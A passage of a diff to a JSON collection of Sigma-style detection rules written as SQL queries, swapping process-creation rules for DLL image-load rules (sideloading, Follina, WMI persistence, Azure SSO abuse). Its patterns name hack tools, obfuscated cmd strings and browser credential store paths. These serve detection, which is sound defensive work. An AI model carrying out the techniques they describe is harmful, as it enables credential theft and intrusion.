ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { - "title": "HackTool - SharpLDAPmonitor Execution", - "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", - "status": "experimental", - "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "status": "test", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.discovery" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" + "filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Potential Dosfuscation Activity", - "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", - "status": "experimental", - "description": "Detects possible payload obfuscation via the commandline", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "status": "test", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_dosfuscation.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", + "title": "Python Py2Exe Image Load", + "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", + "author": "Patrick St. John, OTR (Open Threat Research)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.t1027.002" ], "falsepositives": [ - "Unknown" + "Legitimate Py2Exe Binaries", + "Known false positive caused with Python Anaconda" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Description = 'Python Core' AND NOT ((NewProcessName LIKE '%Python%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "image_load_susp_python_image_load.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Spooler Service Suspicious Binary Load", + "id": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", + "status": "experimental", + "description": "Detect DLL Load from Spooler Service backup folder", + "author": "FPT.EagleEye, Thomas Patzke (improvements)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Loading of legitimate driver" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_sys.yml" + "filename": "image_load_spoolsv_dll_load.yml" }, { - "title": "Group Membership Reconnaissance Via Whoami.EXE", - "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", + "title": "Suspicious WSMAN Provider Image Loads", + "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "status": "experimental", - "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" ], - "filename": "proc_creation_win_whoami_groups_discovery.yml" + "filename": "image_load_wsman_provider_image_load.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", + "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", "status": "test", - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects WMI command line event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Alternate PowerShell Hosts - Image", + "id": "fe6e002f-f244-4278-9263-20e4b593827f", + "status": "experimental", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Description = 'System.Management.Automation' AND ImageLoaded LIKE '%System.Management.Automation%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\ConfigSync\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_sc_service_path_modification.yml" + "filename": "image_load_alternate_powershell_hosts_moduleload.yml" }, { - "title": "Potential Browser Data Stealing", - "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", - "status": "experimental", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Azure Browser SSO Abuse", + "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "status": "test", + "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", + "author": "Den Iuzvyk", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "False positives are expected since this rules is only looking for the DLL load event. This rule is better used in correlation with related activity" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT (((NewProcessName 